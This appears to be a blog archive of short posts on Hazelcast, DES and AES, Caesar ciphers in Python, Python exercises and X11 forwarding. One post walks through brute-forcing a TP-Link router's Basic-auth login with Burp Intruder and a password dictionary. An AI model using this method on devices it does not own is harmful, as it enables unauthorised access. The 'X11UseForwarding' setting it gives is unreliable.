khanhnn

Th3 282017
 

Hazelcast là một mạng lưu trữ dữ liệu trên bộ nhớ Ram (in-memory data grid). Hazelcast đưa ra cài đặt của các interface trong Java như: Map, Queue, ExcecutorService, Lock… Nó được thiết kế rất nhẹ và dễ sửa dụng. Hazelcast đảm bảo tính sẵn sàng cao (high available) và có khả năng mở rộng (scalable).  Các ứng dụng phân tán có thể sử dụng Hazelcast vào mục đích lưu dữ liệu đệm dạng phân tán (distributed caching), đồng bộ hóa, … Hazelcast được cài đặt bằng ngôn ngữ Java và client cho các ngôn ngữ Java, C/C++, C#… Hazelcast cũng có thể được xem như một giao thức lưu đệm (memcache protocol).

Hazelcast rất đơn giản.

Hazelcast được viết bằng ngôn ngữ Java và không phụ thuộc (dependency) bất kì một thư viện nào khác. Nó đưa ra một API giống với như trong gói Java Util. Bạn chỉ cần thêm dependency gói hazelcast.jar và thiết lập một số cài đặt đơn giản (mất dưới 1 phút) là có thể bắt đầu phát triển ứng dụng với hazelcast.

Hazelcast sử dụng cơ chế mạng ngang hàng (peer-to-peer).

Không giống như rất nhiều các giải pháp NoSQL khác, Hazelcast sử dụng cơ chết mạng ngang hàng. Nó không có master và slave. Tất cả các node lưu số lượng dữ liệu như nhau, và xử lý bằng nhau. Hazelcast có thể được nhúng vào chương trình của bạn hoặc sử dụng chế độ client-server trong đó chương trình của bạn đóng vai trò là client kết nối tới các node Hazelcast.

Hazelcast có khả năng mở rộng cao.

Hazelcast được thiết kế để mở rộng lên tới hàng trăm hoặc hàng nghìn node. Đơn giản chỉ cần thêm các node mới vào cụm Hazelcast chúng ta sẽ mở rộng được cả khả năng lưu trữ và tính toán của cụm một các tuyến tính. Các node duy trì một khết nối TCP với nhau và tất cả các giao tiếp trong cụm sẽ được thông qua tầng này.

Hazelcast nhanh.

Hazelcast lưu trữ mọi thứ trên Ram (in-memory). Nó được thiết kế để thực thi rất nhanh các thao tác đọc và cập nhật (read/update) dữ liệu.

Hazelcast có khả năng chịu lỗi.

Hazelcast lưu các bản sao (backup) của mỗi mảnh dữ liệu trên các node khác nhau. Khi một node bị lỗi, dự liệu trên node đó sẽ được khôi phục lại từ bản sao (bản backup) và cụm Hazelcast vẫn hoạt động bình thường, không có thời gian ngừng hoạt động (downtime = 0).

Phân mảnh (sharding) trong Hazelcast.

Các mảnh trong Hazelcast được gọi là các Partition. Mặc định Hazelcast có 271 partition. Các partition được phân tán trên tất cả các node của cụm. Hazelcast cũng tạo bản backup của các partition và phân tán chúng trên các node.

Partition trên một cụm Hazelcast có 1 node:

hazelcast1

Partition trên một cụm Hazelcast có 2 node:

hazelcast2

Partition trên một cụm Hazelcast có nhiều node:

hazelcast

Hazelcast Topology

Nếu bạn có một ứng dụng có một điểm trung tâm được đồng bộ và cấn tính toàn hiệu năng cao thì việc nhúng hazelcast vào trong ứng dụng rất hữu dụng. Trong trường hợp này các node chứa cả ứng dụng vào dữ liệu.

hazelcast3

 Posted by at 11:46 sáng
Th3 012017
 

The time required to crack an encryption algorithm is directly related to
the length of the key used to secure the communication.

Every now and then, our development team comes across someone still using antiquated DES for encryption.  If you haven’t made the switch to the Advanced Encryption Standard (AES), let’s take a look at the two standards and see why you should!

Data Encryption Standard (DES):

DES is a symmetric block cipher (shared secret key), with a key length of 56-bits. Published as the Federal Information Processing Standards (FIPS) 46 standard in 1977, DES was officially withdrawn in 2005 [although NIST has approved Triple DES (3DES) through 2030 for sensitive government information].

The federal government originally developed DES encryption over 35 years ago to provide cryptographic security for all government communications. The idea was to ensure government systems all used the same, secure standard to facilitate interconnectivity.

To show that the DES was inadequate and should not be used in important systems anymore, a series of challenges were sponsored to see how long it would take to decrypt a message. Two organizations played key roles in breaking DES: distributed.net and the Electronic Frontier Foundation (EFF).

  • The DES I contest (1997) took 84 days to use a brute force attack to break the encrypted message.
  • In 1998, there were two DES II challenges issued. The first challenge took just over a month and the decrypted text was “The unknown message is: Many hands make light work”. The second challenge took less than three days, with the plaintext message “It’s time for those 128-, 192-, and 256-bit keys”.
  • The final DES III challenge in early 1999 only took 22 hours and 15 minutes. Electronic Frontier Foundation’s Deep Crack computer (built for less than $250,000) and distributed.net’s computing network found the 56-bit DES key, deciphered the message, and they (EFF & distributed.net) won the contest. The decrypted message read “See you in Rome (Second AES Candidate Conference, March 22-23, 1999)”, and was found after checking about 30 percent of the key space…Finally proving that DES belonged to the past.

Even Triple DES (3DES), a way of using DES encryption three times, proved ineffective against brute force attacks (in addition to slowing down the process substantially).

Advanced Encryption Standard (AES):

Published as a FIPS 197 standard in 2001. AES data encryption is a more mathematically efficient and elegant cryptographic algorithm, but its main strength rests in the option for various key lengths. AES allows you to choose a 128-bit, 192-bit or 256-bit key, making it exponentially stronger than the 56-bit key of DES. In terms of structure, DES uses the Feistel network which divides the block into two halves before going through the encryption steps. AES on the other hand, uses permutation-substitution, which involves a series of substitution and permutation steps to create the encrypted block. The original DES designers made a great contribution to data security, but one could say that the aggregate effort of cryptographers for the AES algorithm has been far greater.

One of the original requirements by the National Institute of Standards and Technology (NIST) for the replacement algorithm was that it had to be efficient both in software and hardware implementations (DES was originally practical only in hardware implementations). Java and C reference implementations were used to do performance analysis of the algorithms. AES was chosen through an open competition with 15 candidates from as many research teams around the world, and the total amount of resources allocated to that process was tremendous. Finally, in October 2000, a NIST press release announced the selection of Rijndael as the proposed Advanced Encryption Standard (AES).

Comparing DES and AES

DES AES
Developed 1977 2000
Key Length 56 bits 128, 192, or 256 bits
Cipher Type Symmetric block cipher Symmetric block cipher
Block Size 64 bits 128 bits
Security Proven inadequate Considered secure
 Posted by at 1:25 chiều
Th2 282017
 

Khái niệm mã hóa dữ liệu và giải mã

Mã hóa dữ liệu là tiến trình che dấu dữ liệu thật (plaintext), nghĩa là chuyển dữ liệu thật thành dữ liệu không có ý nghĩa hoặc có ý nghĩa khác xa với dữ liệu thật. Tiến trình đó gọi là mã hóa (encrytion). Kết quả của tiến trình gọi là bản mã (ciphertext). Từ “encrytion” được tạo ra từ “cryptography” (mật mã) xuất phát từ tiếng Hi Lạp cổ xưa “Kryptos” (Che dấu) và từ “graphia” (viết). Tiến trình mã hóa dữ liệu có thế được thực hiện bằng cách hoán vị dữ liệu thật hoặc thay thế chúng bằng dữ liệu khác.

Tiến trình ngược với tiến trình mã hóa tức là chuyển từ bản mã thành dữ liệu ban đầu gọi là giải mã.

Hệ mã Caesar

Trong mật mã học, mật mã Caesar (Xê da), còn gọi là mật mã dịch chuyển, là một trong những mật mã đơn giản và được biết đến nhiều nhất. Hệ mã Caesar là một hệ mã hóa thay thế đơn âm, làm việc trên bẳng chữ cái tiếng Anh 26 ký tự. Đó là một dạng của mật mã thay thế, trong đó mỗi ký tự trong văn bản được thay thế bằng một ký tự cách nó một đoạn trong bảng chữ cái để tạo thành bản mã.

Ví dụ:

Đối với bảng mã tiếng anh (ABCDEFGHI…), nếu độ dịch là 3, A sẽ được thay bằng D, B sẽ được thay bằng E, …, W sẽ thay bằng Z, X sẽ thay bằng A, Y sẽ thay bằng B và Z thay bằng C.
Phương pháp được đặt tên theo Caesar, vị hoàng đế đã sử dụng nó thường xuyên trong công việc.
Không gian bản rõ P là các từ cần được mà hóa được tạo từ bảng chữ cái A. Không gian bản rỏ C là các từ đã được mã hóa.

Để mã hóa, người ta đánh số các chữ cái từ 0N-1 (N là tổng số phần tử của bản chữ cái). Không gian khóa K=ZN. Với mỗi khóa K  K hàm mã hóa và giải mã một ký tự có số thứ tự là I sẽ được biểu diễn như sau:

a. Mã hóa : EK(i) = (i+k) mod N
b. Giải mã : DK(i) = (i-k) mod N

Trong đó:
N = 26 nếu hệ mã Caesar sử dụng trên bảng chữ cái tiếng Anh (nếu sử dụng trên bảng chữ cái khác thì N sẽ thay đổi).
k : tương ứng với số thứ tự chữ cái trong bảng mã (ví dụ : a = 0, b = 1 ….)

Xét ví dụ sau:
Cho bản rõ : TOIYEUVIETNAM Khóa k = 4

Tìm bản mã ? Theo công thức thay vào ta sẽ có kết quả sau.

Vậy bản mã là : YSMBYZWMIYREQ

Quá trình giải mã thì ngược lại với quá trình mã hóa.

Cài đặt

Mỗi ngôn ngữ khác nhau sẽ có cách cài đặt khác nhau. Mình sẽ sử dụng Python để cài đặt thuật toán:

Mặc định bạn có thể dụng bảng chữ cái Tiếng Anh nhưng trong phần cài đặt này. Để thực tế hơn. Mình sẽ sử dụng bảng mã Tiếng Việt.

1. Bảng mã

key = 'aáàạảãăắằặẳẵâấầậẩẫbcdđeéẹẻẽêếềệểễfghiíìịỉĩjklmnoóòọỏõôốồộổỗơớờợởỡpqrstuúùụủũưứừựửữvwxyýỳỵỷỹAÁÀẠẢÃĂẮẰẶẲẴÂẤẦẬẨẪBCDĐEÉẸẺẼÊẾỀỆỂỄFGHIÍÌỊỈĨJKLMNOÓÒỌỎÕÔỐỒỘỔỖƠỚỜỢỞỠPQRSTUÚÙỤỦŨƯỨỪỰỬỮVWXYÝỲỴỶỸ0123456789`~!@#$%^&*()'

1. Hàm mã hóa

def encrypt(self, n, plaintext):
    """Encrypt the string and return the ciphertext"""
    result = ''

    for l in plaintext:
        try:
            i = (self.key.index(l) + n) % len(self.key)
            result += self.key[i]
        except ValueError:
            result += l
    return result

Nếu đã đọc xong đống lý thuyết bên trên thì chắc hẳn bạn sẽ không gặp khó khăn gì trong đoạn code cài đặt trên:

Mã hóa : EK(i) = (i+k) mod N

Trong đó:

  • self.key.index(l) : tương ứng với i
  • n: tương ứng với khóa k
  • len(self.key): tương ứng với độ dài của bản mã.

2. Hàm giải mã

def decrypt(self, n, ciphertext):
    """Decrypt the string and return the plaintext"""
    result = ''

    for l in ciphertext:
        try:
            i = (self.key.index(l) - n) % len(self.key)
            result += self.key[i]
        except ValueError:
            result += l

    return result

Áp dụng với công thực giải mã. Ta cũng sẽ viết được hàm tương tự.

3. Gọi hàm

def show_result(self, plaintext, n):
    """Generate a resulting cipher with elements shown"""
    encrypted = self.encrypt(n, plaintext)
    decrypted = self.decrypt(n, encrypted)

    print('Rotation: ', n)
    print('Plaintext: ', plaintext)
    print('Encrytped: ', encrypted)
    print('Decrytped: ', decrypted)

Tài liệu

Đến đây bài viết phần đầu về mã hóa cũng kết thúc.

 Posted by at 10:02 sáng
Th2 242017
 

To wrap up our last 2 discussions about functions, namely how to use functions in Python and the temperature convertor, let us take a look at some functions that you may find useful in the future. We are going to start off easy and stack up. As before, we are going to be using Python 2.7. Before we get started let me remind every one, yes there are other ways, perhaps even better ways to code these functions. This is How I did it. It does not mean this is how you should do it. In fact, I would lover it if you left your version in the comments bellow! If you think it is too long for the comment section, send me an email and I will make it into a post. Lastly, these function are meant as an exercise, please be patient even if some of them do not make sense.

For each function (There are 22) we are going to look at the following:

  1. Brief description of the function
  2. Input types
  3. Excepted output
  4. Notes (if any)
  5. Example execution
  6. Code
  7. Example Output for code
  8. Final Notes (if any)

This is going to be long, so hang on. Let’s get started!

1. Even numbers:
Return a boolean value representing whether x is even or not.

input: number (integer)
output: True or False (boolean)

Example execution:
is_even(5) => False
is_even(42) => True

Code:

1 def is_even(n):
2     return (n % 2) == 0

Code Output:

wpid-python_is_even_output-2014-01-6-19-281.png

Final notes: Be aware the although the function is excepting an integer, a float might be passed in as the value of n. The result would always be False unless n is an even integer.

2. Remove evens:
Given a list of integers, remove all even values from the list and return an odd list of numbers.

input: a list of integers (list)
output: a list of odd numbers (list)

Example execution:
remove_evens([1,2,3,4,5,6]) => [1,3,5]

Code:

* Edited thanks to Eric Wilson (See comments)

1 def remove_evens(alist):
2     res = []
3     for n in alist:
4         if not is_even(n): res.append(n)
5     return res

Code Output:

wpid-python_remove_evens-2014-01-6-19-281.png

Final Note: You will notice that in this function we are calling another function within the module.

3. Min Value:
Accepts a list of numbers, and returns a copy of the smallest value in it.

input: a list if integers (list)
output: the minimum number (integer)

Example execution:
minval([104,22,31,4,54,61]) => 4

Code:

1 def minval(alist):
2     return min(alist)

Code Output:

wpid-python_minval-2014-01-6-19-281.png

Final notes: Although in the input section we assumed that the function should only accept a list of integers. The function, as coded above, will also work for a mixed valued list. Python will use simple comparison to make sense and determine what the min value is.

Final notes 2: I am aware that that this function is useless since all it does is called the built in function min().

4. Index of Min Value:
Accepts a list of numbers, and returns the index (zero based) where the smallest value can be found. It must return the earliest index, in case of ties.

input: a list if integers (list)
output: the minimum number’s index in the list (integer)

Example execution:
min_index([104,22,31,4,54,61]) => 3

Code:

1 def min_index(alist):
2     return alist.index(minval(alist))

Code Output:

wpid-python_minval_index_2-2014-01-6-19-281.png

Final Note: You will notice that in this function we are calling another function within the module.

5. Remove Value:
Finds the first instance of a value, and removes it from the list. Return a boolean, True when the value was removed, and False when the value wasn’t found.

input: an integer value and a list of integer numbers
output: True or False (boolean)

Example execution:
remove_a_value(22,[104,22,31,4,54,61]) => True
remove_a_value(105,[104,22,31,4,54,61]) => False

Code:

1 def remove_a_value(val, alist):
2     try:
3         alist.remove(val)
4         return True
5     except:
6         return False

Code Output:

wpid-python_remove_value-2014-01-6-19-281.png

6. Simple Sort:
Given a list of numbers, you will return a copy of the list with all elements in sorted (ascending) order. You must implement the following algorithm:

make a copy of the list make an empty result list
LOOP as long as the copylist isn’t empty:
find the minimum value in the copylist, remove it
add that minval to the end of the resultlist return the result list

input: a list if integers (list)
output: a list of sorted integers (list)

Example execution:
simple_sort([104, 22, 31, 4, 54, 61]) => [4, 22, 31, 54, 61, 104]

Code:

1 def simple_sort(alist):
2     copy = alist[:]
3     res = []
4     while len(copy) > 0:
5         x = minval(copy)
6         res.append(x)
7         copy.remove(x)
8     return res

Code Output:

wpid-demo_function_6-2014-01-6-19-281.png

Final Note: Although the function is assuming to work on integers, it may also work on other data types. Try it out.

7. Destructive Sort:
This behaves the same as Simple Sort, except that it must modify the original.

input: a list if integers (list)
output: NONE.

NOTE: In this function we will be modifying the original list, meaning it is a destructive function to the arguments passed in. Also note that the function does not have any return statements or a return value.

Example execution:
list_a = [33,94,1,92,54,12]
distraction_sort(list_a)

Code:

1 #The code uses simple_sot(alist) to sort the list and then rewrites the original list values
2 def distraction_sort(xs):
3     temp = simple_sort(xs)
4     for i in range(len(temp)):
5         xs[i] = temp[i]

Code Output:

wpid-demo_function_7-2014-01-6-19-281.png

8. Middle Sort:
Without modifying the original list, find out what the middle element would be when all the elements are sorted. If the length is even (and thus no true ‘middle’ element), then out of the two elements closest to the middle, prefer the left one.

input: a list if integers (list)
output: the middle number if the list was sorted (an integer)

Example execution:
median_value([5,34,29,91,102,44,1,4]) => 29

Code:

1 def median_value(xs):
2     temp = simple_sort(xs)
3     mid = int(len(xs)/2)
4     if is_even(len(xs)): mid -= 1
5     return temp[mid]

Code Output:

wpid-demo_function_8-2014-01-6-19-281.png

9. Kth Sorted:
Like Middle Sort, only we seek the Kth spot, not the middle spot. K is a zero-based integer index into the sorted version of list.

input: a list if integers (list)
output: the kth number if the list was sorted (an integer)

Example execution:
kth(2,[71,43,67,10,4,3,87,103s]) => 10

Code:

1 def kth(k,xs):
2     temp = simple_sort(xs)
3     return temp[k]

Code Output:

wpid-demo_function_9-2014-01-6-19-28.png

10. Zip List:
Given two lists of values, create and return a list of tuples that “zip” up the values from the two lists together – first items in a pair, second items in a pair, and so on.

input: 2 lists of integers (lists)
output: a single list of tuples with values from both lists (a list)

Example execution:
zip([1, 2, 3, 4], [‘a’, ‘b’, ‘c’, ‘d’]) => [(1, ‘a’), (2, ‘b’), (3, ‘c’), (4, ‘d’)]

Code:

1 def zip(xs,ys):
2     res = []
3     i = 0
4     while i < len(xs) and i < len(ys):
5         res.append((xs[i],ys[i]))
6         i += 1
7     return res

Code Output:

wpid-demo_function_10_b-2014-01-6-19-28.png

11. Multiply Lists:
Given two lists of numbers, create a new list of numbers by multiplying the same-indexed values. As soon as one list runs out of values, the resulting list ends.

input: 2 lists of integers (lists)
output: a single list with the values from both list multiplied, while both lists have values (a list)

Example execution:
pairwise_multiply([2, 3, 10, 11], [35, 10, 29, 3]) => [70, 30, 290, 33]

Code:

1 def pairwise_multiply(xs,ys):
2     res = []
3     i = 0
4     while i < len(xs) and i < len(ys):
5         res.append(xs[i]*ys[i])
6         i += 1
7     return res

Code Output:

wpid-demo_cundtion_11-2014-01-6-19-28.png

12. Dot Product:
Given two lists of numbers, return a single number found by multiplying each same-indexed pair of numbers, and adding the results together.

input: 2 lists of integers (lists)
output: the sum of each pair of elements multiplied (an integer)

Example execution:
dot_product([1, 2, 3], [3, 2, 1]) => 10

Code:

1 def dot_product(alist, blist):
2     return sum(pairwise_multiply(alist,blist))

Code Output:

wpid-demo_function_12-2014-01-6-19-28.png

13. N Copies:
Return a list with n copies of val.

input: a number and a value (integer,any)
output: a list with n copies of a given value (a list)

Example execution:
n_copy(5,3) => [5, 5, 5]

Code:

1 def n_copy(val,n):
2     res = []
3     for i in range(n):
4         res.append(val)
5     return res

Code Output:

wpid-demo_function_13-2014-01-6-19-28.png

14. Interleave:
Given two lists of values, create (and return) the interleaved version by making a new list with the first value of list_a, then the first value of list_b, then the second value of list_a, second value of list_b, and so on. Once a list is done the rest of the values from the other list are added to the resulting list.

input: 2 lists of integers (lists)
output: A single list with the values from both lists interleaved (a list)

NOTE: Etra valuees for either list are added to the end of the result list

Example execution:
interleave([‘a’, ‘b’, ‘c’], [1, 2, 3]) => [‘a’, 1, ‘b’, 2, ‘c’, 3]

Code:

1 def interleave(alist,blist):
2     res = []
3     i = 0
4     while i<len(alist) and i<len(blist):
5         res.append(alist[i])
6         res.append(blist[i])
7         i += 1
8     for j in range(i,len(alist)):
9         res.append(alist[j])
10     for j in range(i,len(blist)):
11         res.append(blist[j])
12     return res

Code Output:

wpid-demo_function_14-2014-01-6-19-28.png

15. Riffle Shuffle:
Imagine we were shuffling cards with the standard “riffle” shuffle (just interleaving two halves of the deck together). For many card games, we need to perform multiple shuffling in order to get enough apparent randomness in the order of cards. List represents the ‘deck’ to be shuffled, and n represents how many “riffle” shuffling need to be performed.

input: a single list (a list)
output: a shuffled list (a list)

NOTE: Like function 7, distraction_sort, this function modifies the original values given

Example execution:
list_a = [‘a’,’b’,’c’,’d’,’e’,’f’,’g’]
riffle_shuffle(list_a)

Code:

1 def riffle_shuffle(alist):
2     temp = alist
3     mid = int(len(alist)/2)
4     temp = interleave(temp[0:mid],temp[mid:len(alist)])
5     for i in range(len(alist)):
6         alist[i] = temp[i]

Code Output:

wpid-demo_function_15-2014-01-6-19-28.png

16. Pairs:
Create and return a list of all possible pairs from values in list_a and values in list_b. The order of elements is important! all of the pairs of list_a first element must appear before all pairs involving list_a second element; similarly, when pairing with a specific element from list_a, these pairs must include list_b elements in the same order as original.

input: 2 lists of integers (lists)
output: a single list with pairs of values from both lists (a list)

Example execution:
all_pairs([1, 2, 3], [‘a’, ‘b’, ‘c’]) => [(1, ‘a’), (1, ‘b’), (1, ‘c’), (2, ‘a’), (2, ‘b’), (2, ‘c’), (3, ‘a’), (3, ‘b’), (3, ‘c’)]

Code:

1 def all_pairs(alist,blist):
2     res = []
3     for x in alist:
4         for y in blist:
5             res.append((x,y))
6     return res

Code Output:

wpid-demo_function_16-2014-01-6-19-28.png

17. Build Deck:
Create a fresh, organized deck. You must generate the result from these two strings: one representing all the pips (card values) “23456789TJQKA”, and another representing the suits, “CDHS”.

input: 2 strings, “23456789TJQKA” and “CDHS” (strings)
output: a list of cards (a list)

NOTE: each card will be repressed by a value and suit. For example: 4C is 4 of clubs, TS is ten of spades and QH is queen of heats.

Example execution:
new_deck()

Code:

1 def new_deck():
2     val = "23456789TJQKA"
3     shapes = "CDHS"
4     return (all_pairs(val,shapes))

Code Output:

wpid-demo_function_17_b-2014-01-6-19-28.png

18. Reduce Dimension:
Given a list of more than one dimension, create and return a new list by collapsing that outermost dimension.

input: a multidimensional list (a list)
output: the list without the outmost dimension (a list)

NOTE: This function only reduces the original list dimension by 1, not a full flatten.

Example execution:
flatten([[[1, 2, 3], 4], [5]]) => [[1, 2, 3], 4, 5]

Code:

1 def flatten(alist):
2     res = []
3     for i in alist:
4         for j in i:
5             res.append(j)
6     return res

Code Output:

wpid-demo_function_18-2014-01-6-19-28.png

19. Map:
Given a python function and a sequence of values, create and return a new list by calling the function on each value in the sequence and placing the results into the returned list.

input: a function name and a sequence of values (string,tuple/list)
output: the results from the mapped function onto the sequence of values (a list)

Example execution:
map(ord,”Hello World”) => [72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100]

Code:

1 def map(f,alist):
2     res = []
3     for x in alist:
4         res.append(eval(str(f(x))))
5     return res

Code Output:

wpid-demo_function_19-2014-01-6-19-28.png

20. Zip With:
Combine elements of list_a and list_b together while using the operator, generating a new list.

input: a function and 2 lists (string,lists)
output: a list with the values from applying the function on the lists values (a list)

Example execution:
zip_with(add, [1, 2, 3], [4, 5, 6]) => [5, 7, 9]

Code:

1 def zip_with(f,alist,blist):
2     res = []
3     i = 0
4     while i<len(alist) and i<len(blist):
5         res.append(eval(str(f(alist[i],blist[i]))))
6         i += 1
7     return res

Code Output:

wpid-demo_function_20-2014-01-6-19-28.png

 Posted by at 4:25 chiều
Th2 242017
 

Today I want to talk to you about ciphers, more in particular Caesar Ciphers. Encryption and Decryption of secret messages date back a long time before computers. Countless Nations have utilized ciphers to communicate secrets across distances. For example, lets say I have soldier on the other side of the planet and I am relaying them a message that might put their life at risk. Do we want that message falling into the wrong hands? No. So what can we do? Well, the simple answer is to encrypt the message. Today almost every message is encrypted and packet into protocols several of times. For example, your computer encrypts packets it sends back and forth with your WiFi router all the time. Computers, for better or worse, require us to come up with new encryption methods on a daily basis. However, everyone has to start somewhere. Before you can plunge in and understand things like AES and RSA encryption, we need to start in something basic, like Caesar Ciphers.

wpid-Ciphrdsk-2013-06-3-12-17.gif

Caesar Cipher is pretty simple. It is a substitution cipher that people like to think was user by Julius Caesar. In this cipher we follow a formula to encrypt a message and another to decrypt. Let us take a look at what that means mathematically.

Here is our encryption formula:

wpid-bbb819c72cda43180d98e6ade5cadb04-2013-06-3-12-17.png

And here is decryption:

wpid-d7959a1a4e5af0c29600d66a7fac615b-2013-06-3-12-17.png

And thats it folks. Wait, what does this actually mean? Well, lets first start with out assumptions:

  1. The alphabet we are working with contains 26 letters (English)
  2. n is is a number less than or equal to 25.

These assumptions can be modified for any alphabet language of you choosing. If the alphabet contains m letters, than n has to be less than or equal to m-1. As long as you keep both conditions, you will be fine. Here is a general outline and picture of how the algorithm works. You should be aware that normally n is set to 3, but it will work with any number.

  1. Assign numeric values to each letter in the alphabet.
  2. Encrypt:
    • for each letter in plain_text
      • new letter is letter_numeric_value + n
  3. Decrypt:
    • for each letter in cipher
      • plain_text_letter is letter_numeric_value – n

For it to make some sense, here is a visual picture from Wikipedia:

wpid-320px-Caesar_cipher_left_shift_of_3.svg-2013-06-3-12-17.png

 

So the letter E in our message (plain text) is 5 and n=3, so our encrypted value of E is B. Now that we have some background and a simple example, let us implement it in Python. Like always, we will use Python 2.7. Here is how Caesar Cipher looks like in Python:

First lets look at a simple encryption module:

import sys

def main(argv):
	if (len(sys.argv) != 2):
		sys.exit('Usage: sub.py <k>')
		
	plaintext = list(raw_input('Enter message: '))
	alphabet = list('abcdefghijklmnopqrstuvwxyz')
	k = int(sys.argv[1])
	cipher = ''
		
	for c in plaintext:
		if c in alphabet:
			cipher += alphabet[(alphabet.index(c)+k)%(len(alphabet))]
		
	print 'Your encrypted message is: ' + cipher
	

if __name__ == "__main__":
	main(sys.argv[1:])

In this example we define the alphabet and make use of Python List and Indexing. We ask the user to pass in a key of length k and preform the substation. Here is an example run:

wpid-pythoncaesarciherexample-2013-06-3-12-17.png

Now let us up the stakes to something more complex. After all, this is an encryption that people used to do by hand all the time. Take a look at this program:

1 import sys
2
3 def encrypt(k):
4     plaintext = raw_input('Enter plain text message: ')
5     cipher = ''
6     
7     for each in plaintext:
8         c = (ord(each)+k) % 126
9         
10         if c < 32:
11             c+=31
12             
13         cipher += chr(c)
14         
15     print 'Your encrypted message is: ' + cipher
16
17 def decrypt(k):
18     cipher = raw_input('Enter encrypted message: ')
19     plaintext = ''
20     
21     for each in cipher:
22         p = (ord(each)-k) % 126
23     
24         if p < 32:
25             p+=95
26                         
27         plaintext += chr(p)
28         
29     print 'Your plain text message is: ' + plaintext
30
31 def main(argv):
32     if (len(sys.argv) != 3):
33         sys.exit('Usage: ceaser.py <k> <mode>')
34         
35     if sys.argv[2] == 'e':
36         encrypt(int(sys.argv[1]))
37     elif sys.argv[2] == 'd':
38         decrypt(int(sys.argv[1]))
39     else:
40         sys.exit('Error in mode type')
41
42
43 if __name__ == "__main__":
44     main(sys.argv[1:])

The first question you might ask is why is the mod 126? Well, this version of Caesar Cipher was adapted to take full use of the ASCII Printable Character map, minus the first 32 characters that are not printable. With this program, we can chose a larger n and create a “harder” to break ciphers. You will also notice that now we can do Encryption and Decryption in the same program. Let us try to decrypt ‘khoor’ and see what we get:

wpid-pythoncaesardecryption-2013-06-3-12-17.png

Sweet. Now let’s try to encrypt something a little longer with a different key.

wpid-pythoncaesarlongencryption-2013-06-3-12-17.png

And Decryption:

wpid-pythoncaesarlongdecryption-2013-06-3-12-17.png

Caesar ciphers are nice to play around with and to learn basic concepts, but is really impractical. The number of combination you can get is really small compared to what the computer can generate. Brute force attacks can always crack the code with very little human intervention. Consider a 26 letter alphabet. There are only 25 options for selecting a unique n. That means that if I can generate all the 25 permutations, 1 of them has to be the correct plain text. Let us look brute force braking using the following script:

1 import sys
2
3 def decrypt(k,cipher):
4     plaintext = ''
5     
6     for each in cipher:
7         p = (ord(each)-k) % 126
8     
9         if p < 32:
10             p+=95
11                         
12         plaintext += chr(p)
13         
14     print plaintext
15
16 def main(argv):
17     if (len(sys.argv) != 1):
18         sys.exit('Usage: brute_ceaser.py')
19         
20     cipher = raw_input('Enter message: ')
21         
22     for i in range(1,95,1):
23         decrypt(i,cipher)
24
25 if __name__ == "__main__":
26     main(sys.argv[1:])

I will spare you the entire 94 lines that got printed out, here are a few. Can you guess what the message originally was?

wpid-pythoncaesarbruteforcea-2013-06-3-12-17.png

Here is another one:

wpid-pythoncaesarbruteforceb-2013-06-3-12-17.png

I will let you come to your own conclusions as to how “hard” it is to brake Caesar Ciphers. Personally, I wouldn’t use them for anything simple. Than again, I do not know how many people would check if you used it. I hoped you gain some understanding to how cipher works, substitution ciphers in particular. Next time I might dig a little farther into security algorithms and play around with another step up in encryption-decryption algorithms.

Happy Hacking
Captain DeadBones

 Posted by at 2:27 chiều
Th1 232017
 

In the context of a HTTP transaction, basic access authentication is a method for a HTTP user agent to provide a user name and password when making a request.

HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn’t require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.

The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, but not encrypted or hashed in any way. HTTPS is, therefore, typically preferred used in conjunction with Basic Authentication.

For more details read from wikipedia.org

Attacker: Kali Linux

Target: TP link Router

 In this article I will perform an attack on router and try to bypass its authentication. In order to bypass user authentication page I am going to explore router IP: 192.168.1.1 on browser. Here now you can see it asking for user credential to get inside the control panel of router.

Now I had just typed the random value for authentication in order to fetch the request through burp suite. So before you sent the request to server turn on the burp suite and select proxy tab then click on intercept is on after then send the user authentication by clicking ok

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlight some value in the last line. Here it tells the type of authentication provided by router is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64

Now time to generate the encoded value for authentication inside the burp suite. Click on action tab select send to intruder for brute attack.

Now open intruder frame and click on position. Configure the position where payload will be inserted into request. The attack type determines the way in which the payload assigned to payload position Now select the encoded value of authentication for payload position and click to ADD button on the left side of frame.

The base64 encoded value of Authentication is combination of username and password now the scenario is to generate same encoded value of authentication with help of user password dictionary Therefore I have made a dictionary which contains both user password names in text file and save it on the desktop. Later use this dictionaryunder burp suite through intruder as payload for brute force attack.

In order to use dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options. But we want to send request in encoded value of our payload. To encode your payload click on ADD button available under payload processing

A new dialog box will generate to select the rule choose encode option from list; now select base 64 from drag down list of URL encode key character for payload processing.

This will start brute force attack and try to match string for user authentication. In screenshot you can the statusand length of the highlighted value is different from rest of values. This means we can use this encoded value to bypass the user authentication which occur from request number 6. Now check the username and password of 6thline in dictionary. In dictionary I found admin: ps******** have matching authentication.

Now again open the router IP and this time type the above username and password. From screenshot you can see I have successfully login in control panel of router.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets

Th1 052017
 

X11 forwarding can be useful when a GUI is required, especially for system and configuration tools that don’t have a CLI interface. Here’s how to set up and use X11 Forwarding on Linux and Mac.

More experienced users know that you can connect to a Linux server quite easily using a variety of SSH (Secure Shell) clients. That’s all well and good but what about if you need to use some tool that has a GUI?

The answer is to use X11 forwarding. X11 forwarding is a mechanism that allows a user to start up remote applications but forward the application display to your local Windows machine.

X11 Forwarding on Linux

There are a few minor changes needed on your Linux box to enable X11 forwarding. In this basic example I am using a standard CentOS 6.5 installation with GNOME installed. Other Linux distributions will have a very similar SSH daemon configuration. The SSH configuration file is located at /etc/ssh/sshd_config. Locate and uncomment (or add) the following lines:

            X11Forwarding yes

            X11UseForwarding yes

CentOS Configuration

CentOS ConfigurationThese items allow the traffic to be forwarded over to your computer from the host and also allow forwarding to be used. X11 forwarding can be configured on a per user basis. There are additional options that can be configured for X11 forwarding, but those go beyond the scope of this introductory article. The system can also be configured to allow multiple X11 forwarded users, but each user will have to use a separate port range.

Once the config file’s modifications have been made to your Linux system, the SSH service will need to be restarted to effect the revised configuration. Restart the services by using the command:

            service sshd restart

